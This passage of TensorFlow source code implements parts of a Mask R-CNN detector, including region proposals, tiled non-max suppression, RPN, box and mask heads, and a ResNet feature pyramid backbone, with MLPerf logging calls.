k=batch_size_per_im, sorted=True)
# Contructs indices for gather.
samples_indices = tf.reshape(
samples_indices + tf.expand_dims(
tf.range(batch_size) * tf.shape(boxes)[1], 1), [-1])
rois = tf.reshape(
tf.gather(tf.reshape(boxes, [-1, 4]), samples_indices),
[batch_size, -1, 4])
class_targets = tf.reshape(
tf.gather(
tf.reshape(pre_sample_class_targets, [-1, 1]), samples_indices),
[batch_size, -1])
sample_box_targets = tf.reshape(
tf.gather(tf.reshape(pre_sample_box_targets, [-1, 4]), samples_indices),
[batch_size, -1, 4])
sample_proposal_to_label_map = tf.reshape(
tf.gather(tf.reshape(proposal_to_label_map, [-1, 1]), samples_indices),
[batch_size, -1])
return sample_box_targets, class_targets, rois, sample_proposal_to_label_map
def _top_k(scores, k, topk_sorted):
"""A wrapper that returns top-k scores and indices with batch dimension.
Args:
scores: a tensor with a shape of [batch_size, N]. N is the number of scores.
k: an integer for selecting the top-k elements.
topk_sorted: a boolean to sort the top-k elements.
Returns:
top_k_scores: the selected top-k scores with a shape of [batch_size, k].
gather_indices: the indices to gather the elements. It has a shape of
[batch_size, k].
"""
with tf.name_scope('top_k_wrapper'):
batch_size = scores.shape[0]
top_k_scores, top_k_indices = tf.nn.top_k(
scores, k=k, sorted=topk_sorted)
# Contructs indices for gather.
batch_indices = tf.tile(
tf.expand_dims(tf.range(batch_size), axis=1), [1, k])
gather_indices = tf.stack([batch_indices, top_k_indices], axis=2)
return top_k_scores, gather_indices
def _filter_boxes(scores, boxes, rpn_min_size, image_info):
"""Filters boxes whose height or width is smaller than rpn_min_size.
Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/ops/generate_proposals.py # pylint: disable=line-too-long
Args:
scores: a tensor with a shape of [batch_size, N].
boxes: a tensor with a shape of [batch_size, N, 4]. The proposals
are in pixel coordinates.
rpn_min_size: a integer that represents the smallest length of the image
height or width.
image_info: a tensor of shape [batch_size, 5] where the three columns
encode the input image's [height, width, scale,
original_height, original_width]. `scale` is the scale
factor used to scale the network input size to the original image size.
See dataloader.DetectionInputProcessor for details.
Returns:
scores: a tensor with a shape of [batch_size, anchors]. Same shape and dtype
as input scores.
proposals: a tensor with a shape of [batch_size, anchors, 4]. Same shape and
dtype as input boxes.
"""
with tf.name_scope('filter_boxes'):
y_min, x_min, y_max, x_max = tf.split(
value=boxes, num_or_size_splits=4, axis=2)
image_info = tf.cast(tf.expand_dims(image_info, axis=2), dtype=boxes.dtype)
# The following tensors have a shape of [batch_size, 1, 1].
image_height = image_info[:, 0:1, :]
image_width = image_info[:, 1:2, :]
image_scale = image_info[:, 2:3, :]
min_size = tf.cast(tf.maximum(rpn_min_size, 1), dtype=boxes.dtype)
# Proposal center is computed relative to the scaled input image.
hs = y_max - y_min + 1
ws = x_max - x_min + 1
y_ctr = y_min + hs / 2
x_ctr = x_min + ws / 2
height_mask = tf.greater_equal(hs, min_size * image_scale)
width_mask = tf.greater_equal(ws, min_size * image_scale)
center_mask = tf.logical_and(
tf.less(y_ctr, image_height), tf.less(x_ctr, image_width))
mask = tf.logical_and(tf.logical_and(height_mask, width_mask),
center_mask)[:, :, 0]
scores = tf.where(mask, scores, tf.zeros_like(scores))
boxes = tf.cast(tf.expand_dims(mask, 2), boxes.dtype) * boxes
return scores, boxes
def _self_suppression(iou, _, iou_sum):
batch_size = tf.shape(iou)[0]
can_suppress_others = tf.cast(
tf.reshape(tf.reduce_max(iou, 1) <= 0.5, [batch_size, -1, 1]), iou.dtype)
iou_suppressed = tf.reshape(
tf.cast(tf.reduce_max(can_suppress_others * iou, 1) <= 0.5, iou.dtype),
[batch_size, -1, 1]) * iou
iou_sum_new = tf.reduce_sum(iou_suppressed, [1, 2])
return [
iou_suppressed,
tf.reduce_any(iou_sum - iou_sum_new > 0.5), iou_sum_new
]
def _cross_suppression(boxes, box_slice, iou_threshold, inner_idx):
batch_size = tf.shape(boxes)[0]
new_slice = tf.slice(boxes, [0, inner_idx * _NMS_TILE_SIZE, 0],
[batch_size, _NMS_TILE_SIZE, 4])
iou = _bbox_overlap(new_slice, box_slice)
ret_slice = tf.expand_dims(
tf.cast(tf.reduce_all(iou < iou_threshold, [1]), box_slice.dtype),
2) * box_slice
return boxes, ret_slice, iou_threshold, inner_idx + 1
def _suppression_loop_body(boxes, iou_threshold, output_size, idx):
"""Process boxes in the range [idx*_NMS_TILE_SIZE, (idx+1)*_NMS_TILE_SIZE).
Args:
boxes: a tensor with a shape of [batch_size, anchors, 4].
iou_threshold: a float representing the threshold for deciding whether boxes
overlap too much with respect to IOU.
output_size: an int32 tensor of size [batch_size]. Representing the number
of selected boxes for each batch.
idx: an integer scalar representing induction variable.
Returns:
boxes: updated boxes.
iou_threshold: pass down iou_threshold to the next iteration.
output_size: the updated output_size.
idx: the updated induction variable.
"""
num_tiles = tf.shape(boxes)[1] // _NMS_TILE_SIZE
batch_size = tf.shape(boxes)[0]
# Iterates over tiles that can possibly suppress the current tile.
box_slice = tf.slice(boxes, [0, idx * _NMS_TILE_SIZE, 0],
[batch_size, _NMS_TILE_SIZE, 4])
_, box_slice, _, _ = tf.while_loop(
lambda _boxes, _box_slice, _threshold, inner_idx: inner_idx < idx,
_cross_suppression, [boxes, box_slice, iou_threshold,
tf.constant(0)])
# Iterates over the current tile to compute self-suppression.
iou = _bbox_overlap(box_slice, box_slice)
mask = tf.expand_dims(
tf.reshape(tf.range(_NMS_TILE_SIZE), [1, -1]) > tf.reshape(
tf.range(_NMS_TILE_SIZE), [-1, 1]), 0)
iou *= tf.cast(tf.logical_and(mask, iou >= iou_threshold), iou.dtype)
suppressed_iou, _, _ = tf.while_loop(
lambda _iou, loop_condition, _iou_sum: loop_condition, _self_suppression,
[iou, tf.constant(True),
tf.reduce_sum(iou, [1, 2])])
suppressed_box = tf.reduce_sum(suppressed_iou, 1) > 0
box_slice *= tf.expand_dims(1.0 - tf.cast(suppressed_box, box_slice.dtype), 2)
# Uses box_slice to update the input boxes.
mask = tf.reshape(
tf.cast(tf.equal(tf.range(num_tiles), idx), boxes.dtype), [1, -1, 1, 1])
boxes = tf.tile(tf.expand_dims(
box_slice, [1]), [1, num_tiles, 1, 1]) * mask + tf.reshape(
boxes, [batch_size, num_tiles, _NMS_TILE_SIZE, 4]) * (1 - mask)
boxes = tf.reshape(boxes, [batch_size, -1, 4])
# Updates output_size.
output_size += tf.reduce_sum(
tf.cast(tf.reduce_any(box_slice > 0, [2]), tf.int32), [1])
return boxes, iou_threshold, output_size, idx + 1
def _non_max_suppression_padded(
scores, boxes, max_output_size, iou_threshold, level):
"""A wrapper that handles non-maximum suppression.
Assumption:
* The boxes are sorted by scores unless the box is a dot (all coordinates
are zero).
* Boxes with higher scores can be used to suppress boxes with lower scores.
The overal design of the algorithm is to handle boxes tile-by-tile:
boxes = boxes.pad_to_multiply_of(tile_size)
num_tiles = len(boxes) // tile_size
output_boxes = []
for i in range(num_tiles):
box_tile = boxes[i*tile_size : (i+1)*tile_size]
for j in range(i - 1):
suppressing_tile = boxes[j*tile_size : (j+1)*tile_size]
iou = _bbox_overlap(box_tile, suppressing_tile)
# if the box is suppressed in iou, clear it to a dot
box_tile *= _update_boxes(iou)
# Iteratively handle the diagnal tile.
iou = _box_overlap(box_tile, box_tile)
iou_changed = True
while iou_changed:
# boxes that are not suppressed by anything else
suppressing_boxes = _get_suppressing_boxes(iou)
# boxes that are suppressed by suppressing_boxes
suppressed_boxes = _get_suppressed_boxes(iou, suppressing_boxes)
# clear iou to 0 for boxes that are suppressed, as they cannot be used
# to suppress other boxes any more
new_iou = _clear_iou(iou, suppressed_boxes)
iou_changed = (new_iou != iou)
iou = new_iou
# remaining boxes that can still suppress others, are selected boxes.
output_boxes.append(_get_suppressing_boxes(iou))
if len(output_boxes) >= max_output_size:
break
Args:
scores: a tensor with a shape of [batch_size, anchors].
boxes: a tensor with a shape of [batch_size, anchors, 4].
max_output_size: a scalar integer `Tensor` representing the maximum number
of boxes to be selected by non max suppression.
iou_threshold: a float representing the threshold for deciding whether boxes
overlap too much with respect to IOU.
level: a integer for the level that the function operates on.
Returns:
nms_scores: a tensor with a shape of [batch_size, anchors]. It has same
dtype as input scores.
nms_proposals: a tensor with a shape of [batch_size, anchors, 4]. It has
same dtype as input boxes.
"""
with tf.name_scope('nms_l%d' % level):
batch_size = tf.shape(boxes)[0]
num_boxes = tf.shape(boxes)[1]
pad = tf.cast(
tf.ceil(tf.cast(num_boxes, tf.float32) / _NMS_TILE_SIZE),
tf.int32) * _NMS_TILE_SIZE - num_boxes
boxes = tf.pad(tf.cast(boxes, tf.float32), [[0, 0], [0, pad], [0, 0]])
scores = tf.pad(tf.cast(scores, tf.float32), [[0, 0], [0, pad]])
num_boxes += pad
def _loop_cond(unused_boxes, unused_threshold, output_size, idx):
return tf.logical_and(
tf.reduce_min(output_size) < max_output_size,
idx < num_boxes // _NMS_TILE_SIZE)
selected_boxes, _, output_size, _ = tf.while_loop(
_loop_cond, _suppression_loop_body, [
boxes, iou_threshold,
tf.zeros([batch_size], tf.int32),
tf.constant(0)
])
idx = num_boxes - tf.cast(
tf.nn.top_k(
tf.cast(tf.reduce_any(selected_boxes > 0, [2]), tf.int32) *
tf.expand_dims(tf.range(num_boxes, 0, -1), 0), max_output_size)[0],
tf.int32)
idx = tf.minimum(idx, num_boxes - 1)
idx = tf.reshape(
idx + tf.reshape(tf.range(batch_size) * num_boxes, [-1, 1]), [-1])
boxes = tf.reshape(
tf.gather(tf.reshape(boxes, [-1, 4]), idx),
[batch_size, max_output_size, 4])
boxes = boxes * tf.cast(
tf.reshape(tf.range(max_output_size), [1, -1, 1]) < tf.reshape(
output_size, [-1, 1, 1]), boxes.dtype)
scores = tf.reshape(
tf.gather(tf.reshape(scores, [-1, 1]), idx),
[batch_size, max_output_size])
scores = scores * tf.cast(
tf.reshape(tf.range(max_output_size), [1, -1]) < tf.reshape(
output_size, [-1, 1]), scores.dtype)
return scores, boxes
def _proposal_op_per_level(scores, boxes, anchor_boxes, image_info,
rpn_pre_nms_topn, rpn_post_nms_topn,
rpn_nms_threshold, rpn_min_size, level):
"""Proposes RoIs for the second stage nets.
This proposal op performs the following operations.
1. for each location i in a (H, W) grid:
generate A anchor boxes centered on cell i
apply predicted bbox deltas to each of the A anchors at cell i
2. clip predicted boxes to image
3. remove predicted boxes with either height or width < threshold
4. sort all (proposal, score) pairs by score from highest to lowest
5. take the top rpn_pre_nms_topn proposals before NMS
6. apply NMS with a loose threshold (0.7) to the remaining proposals
7. take after_nms_topN proposals after NMS
8. return the top proposals
Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/ops/generate_proposals.py # pylint: disable=line-too-long
Args:
scores: a tensor with a shape of
[batch_size, height, width, num_anchors].
boxes: a tensor with a shape of
[batch_size, height, width, num_anchors * 4], in the encoded form.
anchor_boxes: an Anchors object that contains the anchors with a shape of
[batch_size, height, width, num_anchors * 4].
image_info: a tensor of shape [batch_size, 5] where the three columns
encode the input image's [height, width, scale,
original_height, original_width]. Height and width are for
the input to the network, not the original image; scale is the scale
factor used to scale the network input size to the original image size.
See dataloader.DetectionInputProcessor for details. The last two are
original height and width. See dataloader.DetectionInputProcessor for
details.
rpn_pre_nms_topn: a integer number of top scoring RPN proposals to keep
before applying NMS. This is *per FPN level* (not total).
rpn_post_nms_topn: a integer number of top scoring RPN proposals to keep
after applying NMS. This is the total number of RPN proposals produced.
rpn_nms_threshold: a float number between 0 and 1 as the NMS threshold
used on RPN proposals.
rpn_min_size: a integer number as the minimum proposal height and width as
both need to be greater than this number. Note that this number is at
origingal image scale; not scale used during training or inference).
level: a integer number for the level that the function operates on.
Returns:
scores: a tensor with a shape of [batch_size, rpn_post_nms_topn, 1]
representing the scores of the proposals. It has same dtype as input
scores.
boxes: a tensor with a shape of [batch_size, rpn_post_nms_topn, 4]
represneting the boxes of the proposals. The boxes are in normalized
coordinates with a form of [ymin, xmin, ymax, xmax]. It has same dtype as
input boxes.
"""
with tf.name_scope('proposal-l%d' % level):
# 4. sort all (proposal, score) pairs by score from highest to lowest
# 5. take the top rpn_pre_nms_topn proposals before NMS
batch_size, h, w, num_anchors = scores.get_shape().as_list()
scores = tf.reshape(scores, [batch_size, -1])
boxes = tf.reshape(boxes, [batch_size, -1, 4])
# Map scores to [0, 1] for convenince of setting min score.
scores = tf.sigmoid(scores)
topk_limit = (h * w * num_anchors if h * w * num_anchors < rpn_pre_nms_topn
else rpn_pre_nms_topn)
anchor_boxes = tf.reshape(anchor_boxes, [batch_size, -1, 4])
scores, top_k_indices = tf.nn.top_k(scores, k=topk_limit)
boxes_indices = tf.reshape(
top_k_indices + tf.expand_dims(
tf.range(batch_size) * tf.shape(boxes)[1], 1), [-1])
boxes = tf.reshape(
tf.gather(tf.reshape(boxes, [-1, 4]), boxes_indices),
[batch_size, -1, 4])
anchor_indices = tf.reshape(
top_k_indices + tf.expand_dims(
tf.range(batch_size) * tf.shape(anchor_boxes)[1], 1), [-1])
anchor_boxes = tf.reshape(
tf.gather(tf.reshape(anchor_boxes, [-1, 4]), anchor_indices),
[batch_size, -1, 4])
# Transforms anchors into proposals via bbox transformations.
boxes = anchors.batch_decode_box_outputs_op(anchor_boxes, boxes)
# 2. clip proposals to image (may result in proposals with zero area
# that will be removed in the next step)
boxes = anchors.clip_boxes(boxes, image_info[:, :2])
# 3. remove predicted boxes with either height or width < min_size
scores, boxes = _filter_boxes(scores, boxes, rpn_min_size, image_info)
# 6. apply loose nms (e.g. threshold = 0.7)
# 7. take after_nms_topN (e.g. 300)
# 8. return the top proposals (-> RoIs top)
post_nms_topk_limit = (topk_limit if topk_limit < rpn_post_nms_topn else
rpn_post_nms_topn)
if rpn_nms_threshold > 0:
scores, boxes = _non_max_suppression_padded(
scores, boxes, max_output_size=post_nms_topk_limit,
iou_threshold=rpn_nms_threshold, level=level)
scores, top_k_indices = _top_k(scores, k=post_nms_topk_limit,
topk_sorted=True)
boxes = tf.gather_nd(boxes, top_k_indices)
return scores, boxes
def proposal_op(scores_outputs, box_outputs, all_anchors, image_info,
rpn_pre_nms_topn, rpn_post_nms_topn, rpn_nms_threshold,
rpn_min_size):
"""Proposes RoIs for the second stage nets.
This proposal op performs the following operations.
1. propose rois at each level.
2. collect all proposals.
3. keep rpn_post_nms_topn proposals by their sorted scores from the highest
to the lowest.
Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/ops/collect_and_distribute_fpn_rpn_proposals.py # pylint: disable=line-too-long
Args:
scores_outputs: an OrderDict with keys representing levels and values
representing logits in [batch_size, height, width, num_anchors].
box_outputs: an OrderDict with keys representing levels and values
representing box regression targets in
[batch_size, height, width, num_anchors * 4]
all_anchors: an Anchors object that contains the all anchors.
image_info: a tensor of shape [batch_size, 5] where the three columns
encode the input image's [height, width, scale,
original_height, original_width]. Height and width are for
the input to the network, not the original image; scale is the scale
factor used to scale the network input size to the original image size.
See dataloader.DetectionInputProcessor for details. The last two are
original height and width. See dataloader.DetectionInputProcessor for
details.
rpn_pre_nms_topn: a integer number of top scoring RPN proposals to keep
before applying NMS. This is *per FPN level* (not total).
rpn_post_nms_topn: a integer number of top scoring RPN proposals to keep
after applying NMS. This is the total number of RPN proposals produced.
rpn_nms_threshold: a float number between 0 and 1 as the NMS threshold
used on RPN proposals.
rpn_min_size: a integer number as the minimum proposal height and width as
both need to be greater than this number. Note that this number is at
origingal image scale; not scale used during training or inference).
Returns:
scores: a tensor with a shape of [batch_size, rpn_post_nms_topn, 1]
representing the scores of the proposals.
rois: a tensor with a shape of [batch_size, rpn_post_nms_topn, 4]
representing the boxes of the proposals. The boxes are in normalized
coordinates with a form of [ymin, xmin, ymax, xmax].
"""
with tf.name_scope('proposal'):
levels = scores_outputs.keys()
scores = []
rois = []
anchor_boxes = all_anchors.get_unpacked_boxes()
for level in levels:
# Expands the batch dimension for anchors as anchors do not have batch
# dimension. Note that batch_size is invariant across levels.
batch_size = scores_outputs[level].shape[0]
anchor_boxes_batch = tf.cast(
tf.tile(tf.expand_dims(anchor_boxes[level], axis=0),
[batch_size, 1, 1, 1]),
dtype=scores_outputs[level].dtype)
scores_per_level, boxes_per_level = _proposal_op_per_level(
scores_outputs[level], box_outputs[level], anchor_boxes_batch,
image_info, rpn_pre_nms_topn, rpn_post_nms_topn, rpn_nms_threshold,
rpn_min_size, level)
scores.append(scores_per_level)
rois.append(boxes_per_level)
scores = tf.concat(scores, axis=1)
rois = tf.concat(rois, axis=1)
with tf.name_scope('post_nms_topk'):
# Selects the top-k rois, k being rpn_post_nms_topn or the number of total
# anchors after non-max suppression.
post_nms_num_anchors = scores.shape[1]
post_nms_topk_limit = (
post_nms_num_anchors if post_nms_num_anchors < rpn_post_nms_topn
else rpn_post_nms_topn)
top_k_scores, top_k_indices = _top_k(scores, k=post_nms_topk_limit,
topk_sorted=True)
top_k_rois = tf.gather_nd(rois, top_k_indices)
top_k_scores = tf.stop_gradient(top_k_scores)
top_k_rois = tf.stop_gradient(top_k_rois)
return top_k_scores, top_k_rois
def rpn_net(features, min_level=2, max_level=6, num_anchors=3):
"""Region Proposal Network (RPN) for Mask-RCNN."""
scores_outputs = {}
box_outputs = {}
with tf.variable_scope('rpn_net', reuse=tf.AUTO_REUSE):
def shared_rpn_heads(features, num_anchors):
"""Shared RPN heads."""
# TODO(chiachenc): check the channel depth of the first convoultion.
features = tf.layers.conv2d(
features,
256,
kernel_size=(3, 3),
strides=(1, 1),
activation=tf.nn.relu,
bias_initializer=tf.zeros_initializer(),
kernel_initializer=tf.random_normal_initializer(stddev=0.01),
padding='same',
name='rpn')
# Proposal classification scores
scores = tf.layers.conv2d(
features,
num_anchors,
kernel_size=(1, 1),
strides=(1, 1),
bias_initializer=tf.zeros_initializer(),
kernel_initializer=tf.random_normal_initializer(stddev=0.01),
padding='valid',
name='rpn-class')
# Proposal bbox regression deltas
bboxes = tf.layers.conv2d(
features,
4 * num_anchors,
kernel_size=(1, 1),
strides=(1, 1),
bias_initializer=tf.zeros_initializer(),
kernel_initializer=tf.random_normal_initializer(stddev=0.01),
padding='valid',
name='rpn-box')
return scores, bboxes
for level in range(min_level, max_level + 1):
scores_output, box_output = shared_rpn_heads(features[level], num_anchors)
scores_outputs[level] = scores_output
box_outputs[level] = box_output
return scores_outputs, box_outputs
def faster_rcnn_heads(features, boxes, num_classes=91, mlp_head_dim=1024):
"""Box and class branches for the Mask-RCNN model.
Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/modeling/fast_rcnn_heads.py # pylint: disable=line-too-long
Args:
features: A dictionary with key as pyramid level and value as features.
The features are in shape of [batch_size, height_l, width_l, num_filters].
boxes: A 3-D Tensor of shape [batch_size, num_boxes, 4]. Each row
represents a box with [y1, x1, y2, x2] in un-normalized coordinates.
num_classes: a integer for the number of classes.
mlp_head_dim: a integer that is the hidden dimension in the fully-connected
layers.
Returns:
class_outputs: a tensor with a shape of
[batch_size, num_rois, num_classes], representing the class predictions.
box_outputs: a tensor with a shape of
[batch_size, num_rois, num_classes * 4], representing the box predictions.
"""
with tf.variable_scope('faster_rcnn_heads'):
# Performs multi-level RoIAlign.
roi_features = multilevel_crop_and_resize(features, boxes, output_size=7)
# reshape inputs beofre FC.
batch_size, num_rois, _, _, _ = roi_features.get_shape().as_list()
roi_features = tf.reshape(roi_features, [batch_size, num_rois, -1])
net = tf.layers.dense(roi_features, units=mlp_head_dim,
activation=tf.nn.relu, name='fc6')
net = tf.layers.dense(net, units=mlp_head_dim,
activation=tf.nn.relu, name='fc7')
class_outputs = tf.layers.dense(
net, num_classes,
kernel_initializer=tf.random_normal_initializer(stddev=0.01),
bias_initializer=tf.zeros_initializer(),
name='class-predict')
box_outputs = tf.layers.dense(
net, num_classes * 4,
kernel_initializer=tf.random_normal_initializer(stddev=0.001),
bias_initializer=tf.zeros_initializer(),
name='box-predict')
return class_outputs, box_outputs
def mask_rcnn_heads(features, fg_box_rois, num_classes=91, mrcnn_resolution=28):
"""Mask branch for the Mask-RCNN model.
Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/modeling/mask_rcnn_heads.py # pylint: disable=line-too-long
Args:
features: A dictionary with key as pyramid level and value as features.
The features are in shape of [batch_size, height_l, width_l, num_filters].
fg_box_rois: A 3-D Tensor of shape [batch_size, num_masks, 4]. Each row
represents a box with [y1, x1, y2, x2] in un-normalized coordinates.
num_classes: a integer for the number of classes.
mrcnn_resolution: a integer that is the resolution of masks.
Returns:
mask_outputs: a tensor with a shape of
[batch_size, num_masks, mask_height, mask_width, num_classes],
representing the mask predictions.
fg_gather_indices: a tensor with a shape of [batch_size, num_masks, 2],
representing the fg mask targets.
Raises:
ValueError: If boxes is not a rank-3 tensor or the last dimension of
boxes is not 4.
"""
def _get_stddev_equivalent_to_msra_fill(kernel_size, fan_out):
"""Returns the stddev of random normal initialization as MSRAFill."""
# Reference: https://github.com/pytorch/pytorch/blob/master/caffe2/operators/filler_op.h#L445-L463 # pylint: disable=line-too-long
# For example, kernel size is (3, 3) and fan out is 256, stddev is 0.029.
# stddev = (2/(3*3*256))^0.5 = 0.029
return (2 / (kernel_size[0] * kernel_size[1] * fan_out)) ** 0.5
if fg_box_rois.shape.ndims != 3:
raise ValueError('fg_box_rois must be of rank 3.')
if fg_box_rois.shape[2] != 4:
raise ValueError(
'fg_box_rois.shape[1] is {:d}, but must be divisible by 4.'.format(
fg_box_rois.shape[1])
)
with tf.variable_scope('mask_rcnn_heads'):
batch_size, num_masks, _ = fg_box_rois.get_shape().as_list()
# Performs multi-level RoIAlign.
features = multilevel_crop_and_resize(features, fg_box_rois, output_size=14)
net = tf.reshape(
features,
[batch_size * num_masks, 14, 14, -1])
# TODO(chiachenc): check what is MSRAFill initialization in the reference.
for i in range(4):
kernel_size = (3, 3)
fan_out = 256
init_stddev = _get_stddev_equivalent_to_msra_fill(kernel_size, fan_out)
net = tf.layers.conv2d(
net,
fan_out,
kernel_size=kernel_size,
strides=(1, 1),
padding='same',
dilation_rate=(1, 1),
activation=tf.nn.relu,
kernel_initializer=tf.random_normal_initializer(stddev=init_stddev),
bias_initializer=tf.zeros_initializer(),
name='mask-conv-l%d' % i)
kernel_size = (2, 2)
fan_out = 256
init_stddev = _get_stddev_equivalent_to_msra_fill(kernel_size, fan_out)
net = tf.layers.conv2d_transpose(
net,
fan_out,
kernel_size=kernel_size,
strides=(2, 2),
padding='valid',
activation=tf.nn.relu,
kernel_initializer=tf.random_normal_initializer(stddev=init_stddev),
bias_initializer=tf.zeros_initializer(),
name='conv5-mask')
kernel_size = (1, 1)
fan_out = num_classes
init_stddev = _get_stddev_equivalent_to_msra_fill(kernel_size, fan_out)
mask_outputs = tf.layers.conv2d(
net,
fan_out,
kernel_size=kernel_size,
strides=(1, 1),
padding='valid',
kernel_initializer=tf.random_normal_initializer(stddev=init_stddev),
bias_initializer=tf.zeros_initializer(),
name='mask_fcn_logits')
mask_outputs = tf.reshape(
mask_outputs,
[batch_size, num_masks, mrcnn_resolution, mrcnn_resolution, -1])
return mask_outputs
def select_fg_for_masks(class_targets, box_targets, boxes,
proposal_to_label_map, max_num_fg=128):
"""Selects the fore ground objects for mask branch during training.
Args:
class_targets: a tensor of shape [batch_size, num_boxes] representing the
class label for each box.
box_targets: a tensor with a shape of [batch_size, num_boxes, 4]. The tensor
contains the ground truth pixel coordinates of the scaled images for each
roi.
boxes: A 3-D Tensor of shape [batch_size, num_boxes, 4]. Each row
represents a box with [y1, x1, y2, x2] in un-normalized coordinates.
proposal_to_label_map: a tensor with a shape of [batch_size, num_boxes].
This tensor keeps the mapping between proposal to labels.
proposal_to_label_map[i] means the index of the ground truth instance for
the i-th proposal.
max_num_fg: a integer represents the number of masks per image.
Returns:
class_targets, boxes, proposal_to_label_map, box_targets that have
foreground objects.
"""
with tf.name_scope('select_fg_for_masks'):
# Masks are for positive (fg) objects only. Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/roi_data/mask_rcnn.py # pylint: disable=line-too-long
batch_size = boxes.shape[0]
_, fg_indices = tf.nn.top_k(
tf.to_float(tf.greater(class_targets, 0)), k=max_num_fg)
# Contructs indices for gather.
indices = tf.reshape(
fg_indices + tf.expand_dims(
tf.range(batch_size) * tf.shape(class_targets)[1], 1), [-1])
fg_class_targets = tf.reshape(
tf.gather(tf.reshape(class_targets, [-1, 1]), indices),
[batch_size, -1])
fg_box_targets = tf.reshape(
tf.gather(tf.reshape(box_targets, [-1, 4]), indices),
[batch_size, -1, 4])
fg_box_rois = tf.reshape(
tf.gather(tf.reshape(boxes, [-1, 4]), indices), [batch_size, -1, 4])
fg_proposal_to_label_map = tf.reshape(
tf.gather(tf.reshape(proposal_to_label_map, [-1, 1]), indices),
[batch_size, -1])
return (fg_class_targets, fg_box_targets, fg_box_rois,
fg_proposal_to_label_map)
def resnet_fpn(features,
min_level=3,
max_level=7, # pylint: disable=unused-argument
resnet_depth=50,
is_training_bn=False):
"""ResNet feature pyramid networks."""
# upward layers
with tf.variable_scope('resnet%s' % resnet_depth):
resnet_fn = resnet_v1(resnet_depth)
u2, u3, u4, u5 = resnet_fn(features, is_training_bn)
feats_bottom_up = {
2: u2,
3: u3,
4: u4,
5: u5,
}
with tf.variable_scope('resnet_fpn'):
# lateral connections
feats_lateral = {}
for level in range(min_level, _RESNET_MAX_LEVEL + 1):
feats_lateral[level] = tf.layers.conv2d(
feats_bottom_up[level],
filters=256,
kernel_size=(1, 1),
padding='same',
name='l%d' % level)
# add top-down path
feats = {_RESNET_MAX_LEVEL: feats_lateral[_RESNET_MAX_LEVEL]}
for level in range(_RESNET_MAX_LEVEL - 1, min_level - 1, -1):
feats[level] = nearest_upsampling(
feats[level + 1], 2) + feats_lateral[level]
# add post-hoc 3x3 convolution kernel
for level in range(min_level, _RESNET_MAX_LEVEL + 1):
feats[level] = tf.layers.conv2d(
feats[level],
filters=256,
strides=(1, 1),
kernel_size=(3, 3),
padding='same',
name='post_hoc_d%d' % level)
# Use original FPN P6 level implementation from CVPR'17 FPN paper instead of
# coarse FPN levels introduced for RetinaNet.
# Reference: https://github.com/ddkang/Detectron/blob/80f329530843e66d07ca39e19901d5f3e5daf009/lib/modeling/FPN.py # pylint: disable=line-too-long
feats[6] = tf.layers.max_pooling2d(
inputs=feats[5],
pool_size=1,
strides=2,
padding='valid',
name='p6')
return feats
def mask_rcnn(features, labels, all_anchors, mode, params):
"""Mask-RCNN classification and regression model."""
min_level = params['min_level']
max_level = params['max_level']
# create feature pyramid networks
fpn_feats = resnet_fpn(features, min_level, max_level, params['resnet_depth'],
params['is_training_bn'])
def rpn_fn(feats):
rpn_score_outputs, rpn_box_outputs = rpn_net(
feats, min_level, max_level,
len(params['aspect_ratios'] * params['num_scales']))
return rpn_score_outputs, rpn_box_outputs
# Box and class part (Fast-RCNN).
def faster_rcnn_fn(feats, rpn_score_outputs, rpn_box_outputs):
"""Generates box and class outputs."""
# Uses different NMS top-k parameters in different modes.
mlperf_log.maskrcnn_print(key=mlperf_log.RPN_PRE_NMS_TOP_N_TRAIN,
value=params['rpn_pre_nms_topn'])
mlperf_log.maskrcnn_print(key=mlperf_log.RPN_PRE_NMS_TOP_N_TEST,
value=params['test_rpn_pre_nms_topn'])
mlperf_log.maskrcnn_print(key=mlperf_log.RPN_POST_NMS_TOP_N_TRAIN,
value=params['rpn_post_nms_topn'])
mlperf_log.maskrcnn_print(key=mlperf_log.RPN_POST_NMS_TOP_N_TEST,
value=params['test_rpn_post_nms_topn'])
rpn_pre_nms_topn = (
params['rpn_pre_nms_topn'] if mode == tf.estimator.ModeKeys.TRAIN else
params['test_rpn_pre_nms_topn'])
rpn_post_nms_topn = (
params['rpn_post_nms_topn'] if mode == tf.estimator.ModeKeys.TRAIN else
params['test_rpn_post_nms_topn'])
_, box_rois = proposal_op(rpn_score_outputs, rpn_box_outputs, all_anchors,
labels['image_info'], rpn_pre_nms_topn,
rpn_post_nms_topn, params['rpn_nms_threshold'],
params['rpn_min_size'])
box_rois = tf.to_float(box_rois)
mlperf_log.maskrcnn_print(key=mlperf_log.FG_IOU_THRESHOLD,
value=params['fg_thresh'])
mlperf_log.maskrcnn_print(key=mlperf_log.BG_IOU_THRESHOLD,
value=params['bg_thresh_hi'])
(box_targets, class_targets, box_rois,
proposal_to_label_map) = proposal_label_op(
box_rois, labels['groundtruth_data'][:, :, :4],
labels['groundtruth_data'][:, :, 6], labels['image_info'],
batch_size_per_im=params['batch_size_per_im'],
fg_fraction=params['fg_fraction'], fg_thresh=params['fg_thresh'],
bg_thresh_hi=params['bg_thresh_hi'],
bg_thresh_lo=params['bg_thresh_lo'],
is_training=(mode == tf.estimator.ModeKeys.TRAIN))
class_outputs, box_outputs = faster_rcnn_heads(
feats, box_rois, num_classes=params['num_classes'],
mlp_head_dim=params['fast_rcnn_mlp_head_dim'])
return (class_outputs, box_outputs, class_targets, box_targets, box_rois,
proposal_to_label_map)
# Mask part (Mask-RCNN).
def mask_rcnn_fn(feats, class_targets=None, box_targets=None, box_rois=None,
proposal_to_label_map=None, detections=None):
"""Generates mask outputs (and mask targets during training)."""
if mode == tf.estimator.ModeKeys.TRAIN:
(class_targets, box_targets, box_rois,
proposal_to_label_map) = select_fg_for_masks(
class_targets, box_targets, box_rois, proposal_to_label_map,
max_num_fg=int(params['batch_size_per_im'] * params['fg_fraction']))
mask_targets = get_mask_targets(
box_rois, proposal_to_label_map, box_targets,
labels['cropped_gt_masks'], params['mrcnn_resolution'])
mask_outputs = mask_rcnn_heads(
feats, box_rois, num_classes=params['num_classes'],
mrcnn_resolution=params['mrcnn_resolution'])
return (mask_outputs, class_targets, box_targets, box_rois,
proposal_to_label_map, mask_targets)
else:
box_rois = detections[:, :, 1:5]
mask_outputs = mask_rcnn_heads(
